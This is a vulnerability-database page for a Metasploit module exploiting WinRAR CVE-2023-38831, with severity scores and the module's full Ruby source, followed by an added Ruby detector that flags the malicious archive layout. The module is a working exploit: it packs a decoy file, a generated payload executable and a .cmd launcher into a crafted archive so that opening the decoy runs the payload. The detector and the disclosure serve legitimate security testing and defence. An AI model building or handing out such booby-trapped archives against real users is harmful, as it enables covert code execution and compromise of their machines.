metasploit / Alexander "xaitax" Hagenah / MSF:EXPLOIT-WINDOWS-FILEFORMAT-WINRAR_CVE_2023_38831
History: Sep 04, 2023 - 4:56 p.m.

WinRAR CVE-2023-38831 Exploit

2023-09-04 16:56:22
Alexander "xaitax" Hagenah
www.rapid7.com
winrar vulnerability exploit

7.8 High

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

7.9 High

AI Score

Confidence

High

0.192 Low

EPSS

Percentile

96.3%

This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its embedded document, the decoy document is executed, leading to code execution.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WinRAR CVE-2023-38831 Exploit',
        'Description' => %q{
          This module exploits a vulnerability in WinRAR (CVE-2023-38831). When a user opens a crafted RAR file and its
          embedded document, the decoy document is executed, leading to code execution.
        },
        'License' => MSF_LICENSE,
        'Author' => ['Alexander "xaitax" Hagenah'],
        'References' => [
          ['CVE', '2023-38831'],
          ['URL', 'https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/'],
          ['URL', 'https://b1tg.github.io/post/cve-2023-38831-winrar-analysis/']
        ],
        'Platform' => ['win'],
        'Arch' => [ ARCH_X64, ARCH_X86 ],
        'Targets' => [['Windows', {}]],
        'Payload' => {
          'DisableNops' => true
        },
        'DisclosureDate' => '2023-08-23',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )

    register_options([
      OptString.new('OUTPUT_FILE', [true, 'The output filename.', 'poc.rar']),
      OptPath.new('INPUT_FILE', [true, 'Path to the decoy file (PDF, JPG, PNG, etc.).'])
    ])

    register_advanced_options([
      OptString.new('PAYLOAD_NAME', [true, 'The filename for the payload executable.', Rex::Text.rand_text_alpha(8) + '.exe'])
    ])
  end

  def exploit
    Dir.mktmpdir do |temp_dir|
      output_rar = File.join(Msf::Config.local_directory, datastore['OUTPUT_FILE'])
      input_file = datastore['INPUT_FILE']
      decoy_name = File.basename(input_file)
      decoy_ext = ".#{File.extname(input_file)[1..]}"
      payload_name = datastore['PAYLOAD_NAME']
      decoy_dir = File.join(temp_dir, "#{decoy_name}A")
      Dir.mkdir(decoy_dir)

      payload_path = File.join(decoy_dir, payload_name)
      File.open(payload_path, 'wb') { |file| file.write(generate_payload_exe) }

      bat_script = <<~BAT
        @echo off
        start "" "%~dp0#{payload_name}"
        start "" "%~dp0#{decoy_name}"
      BAT

      bat_path = File.join(decoy_dir, "#{decoy_name}A.cmd")
      File.write(bat_path, bat_script)

      FileUtils.cp(input_file, File.join(temp_dir, "#{decoy_name}B"))

      zip_path = File.join(temp_dir, 'template.zip')
      Zip::File.open(zip_path, Zip::File::CREATE) do |zipfile|
        zipfile.add("#{decoy_name}B", File.join(temp_dir, "#{decoy_name}B"))
        zipfile.add("#{decoy_name}A/#{decoy_name}A.cmd", bat_path)
        zipfile.add("#{decoy_name}A/#{payload_name}", payload_path)
      end

      content = File.binread(zip_path)
      content.gsub!(decoy_ext + 'A', decoy_ext + ' ')
      content.gsub!(decoy_ext + 'B', decoy_ext + ' ')

      File.binwrite(output_rar, content)

      print_good("Created #{output_rar}")
    end
  end

end
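The module above writes a ZIP container with rubyzip (the .rar extension is only a name) and then rewrites the entry names so that the decoy file and a same-named directory both end in a trailing space, with a .cmd launcher inside the directory. Added here as a defender-side example that is not part of the module or of Metasploit: a pure-Ruby check that parses a ZIP central directory and flags exactly that layout (a top-level name ending in a space plus a same-named directory holding an executable-type file). The sample archive is constructed inline with a small stored-ZIP builder, and its entry names are assumptions chosen for illustration.

```ruby
require 'zlib'

# Constructed test input only: build a minimal stored (uncompressed) ZIP
# from name => data pairs so the check below can run offline.
def build_stored_zip(entries)
  local = ''.b
  central = ''.b
  entries.each do |name, data|
    name = name.b
    data = data.b
    crc = Zlib.crc32(data)
    offset = local.bytesize
    lh = ['PK', 3, 4, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize, name.bytesize, 0]
    local << lh.pack('a2C2v5V3v2') << name << data
    ch = ['PK', 1, 2, 20, 20, 0, 0, 0, 0, crc, data.bytesize, data.bytesize,
          name.bytesize, 0, 0, 0, 0, 0, offset]
    central << ch.pack('a2C2v6V3v5V2') << name
  end
  eocd = ['PK', 5, 6, 0, 0, entries.size, entries.size, central.bytesize, local.bytesize, 0]
  local + central + eocd.pack('a2C2v4V2v')
end

# Read every entry name from the central directory (the listing an archiver shows).
def zip_entry_names(bytes)
  eocd = bytes.rindex("PK\x05\x06".b) or raise 'no end-of-central-directory record'
  count, _cd_size, cd_off = bytes[eocd + 10, 10].unpack('vVV')
  names = []
  pos = cd_off
  count.times do
    raise 'bad central directory header' unless bytes[pos, 4] == "PK\x01\x02".b
    name_len, extra_len, comment_len = bytes[pos + 28, 6].unpack('vvv')
    names << bytes[pos + 46, name_len]
    pos += 46 + name_len + extra_len + comment_len
  end
  names
end

EXEC_EXTS = %w[.cmd .bat .exe .com .vbs .js .wsf .ps1 .scr].freeze

# CVE-2023-38831 layout: a top-level entry ending in a space plus a
# same-named directory that holds an executable-type file.
def suspicious_entries(names)
  names.select { |n| !n.include?('/') && n.end_with?(' ') }.filter_map do |decoy|
    execs = names.select do |n|
      n.start_with?("#{decoy}/") && EXEC_EXTS.include?(File.extname(n).downcase)
    end
    { decoy: decoy, executables: execs } unless execs.empty?
  end
end

# Constructed sample mirroring the module's output layout (names are assumptions).
SAMPLE_ZIP = build_stored_zip(
  'report.pdf ' => '%PDF-1.4 decoy bytes',
  'report.pdf /report.pdf .cmd' => 'launcher placeholder',
  'report.pdf /abcdefgh.exe' => 'MZ payload placeholder'
)
p suspicious_entries(zip_entry_names(SAMPLE_ZIP))
```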
